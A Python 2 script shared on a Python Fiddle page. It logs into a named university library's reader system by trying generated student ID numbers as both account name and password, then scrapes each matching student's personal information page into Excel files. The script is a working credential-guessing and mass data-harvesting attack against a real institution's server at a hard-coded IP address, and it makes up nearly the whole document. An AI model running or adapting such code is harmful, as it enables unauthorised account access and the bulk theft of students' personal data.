import HTMLParser import urlparse import urllib import urllib2 import cookielib import string import re import xlwt def htmlread(post='http://202.116.41.246:8080/reader/',idn=2013021801,psw=2013021801): '''登陆网页,读取网页''' hosturl='http://lib.scnu.edu.cn/' #生成cookie cookie = cookielib.CookieJar() #创建一个新的opener来使用cookiejar opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie)) #post地址 posturl=post+'redr_verify.php' #构建头结构,模拟浏览器 headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.66 Safari/537.36', 'Referer':'http://202.116.41.246:8080/reader/redr_cust_result.php'} #通过chorme抓包获取postdata postdata=urllib.urlencode({'number':str(idn),'passwd':str(psw), 'select':'cert_no','returnUrl':''}) #发送请求 req=urllib2.Request(posturl,postdata,headers) #打开网页,登陆成功 result = opener.open(req) #打印cookie for item in cookie: #print 'Cookie:Name = '+item.name print 'Cookie:Value = '+item.value #打开学生信息网页 result = opener.open(post+'redr_info.php') #读取网页信息 html=result.read() return html def RegularCal(html): '''正则表达式提取要数信息''' reg='<span class="bluetext">(.*?)</span>(.*?)</TD>' comlists=re.findall(re.compile(reg),html) return comlists def WriInEx(path0='C:/Users/kanon/Desktop/studentinfo.xls',idn=20112600000): '''将结果储存进Excel''' #设定初始ID,id前四位为入学年级 ID=idn #设定工作簿,并设定编码形式 aexcel=xlwt.Workbook('gbk',0) #增加一个Sheet Sheet=aexcel.add_sheet('info') iname=1 for i in range(300): html=htmlread(post='http://202.116.41.246:8080/reader/',idn=ID+i,psw=ID+i) data=RegularCal(html) if data==[]: pass else: print i beganRow=2*i colnum=0 try: for col in data: colnum=colnum+1 for rownum in range(len(col)): val=col[rownum].decode('utf-8')#将值进行utf-8解码 if val=='': val='0' Sheet.write(beganRow+rownum,colnum,val) else: #write(行,列,单元格内容) Sheet.write(beganRow+rownum,colnum,val) except Exception,e: print str(e) aexcel.save(path0) if __name__ =='__main__': idn=20120300000 for yuannum in range(30): idn=idn+yuannum*100000 for nianji in range(4): idn=idn+nianji*10000000 for ban in range(2): path='D:/num'+'%s'%nianji+'%s'%yuannum+'%s'%ban+'studinfo.xls' idn=idn+ban*1000 WriInEx(path,idn)
Run
Reset
Share
Import
Link
Embed
Language▼
English
中文
Python Fiddle
Python Cloud IDE
Follow @python_fiddle
Browser Version Not Supported
Due to Python Fiddle's reliance on advanced JavaScript techniques, older browsers might have problems running it correctly. Please download the latest version of your favourite browser.
Chrome 10+
Firefox 4+
Safari 5+
IE 10+
Let me try anyway!
url:
Go
Python Snippet
Stackoverflow Question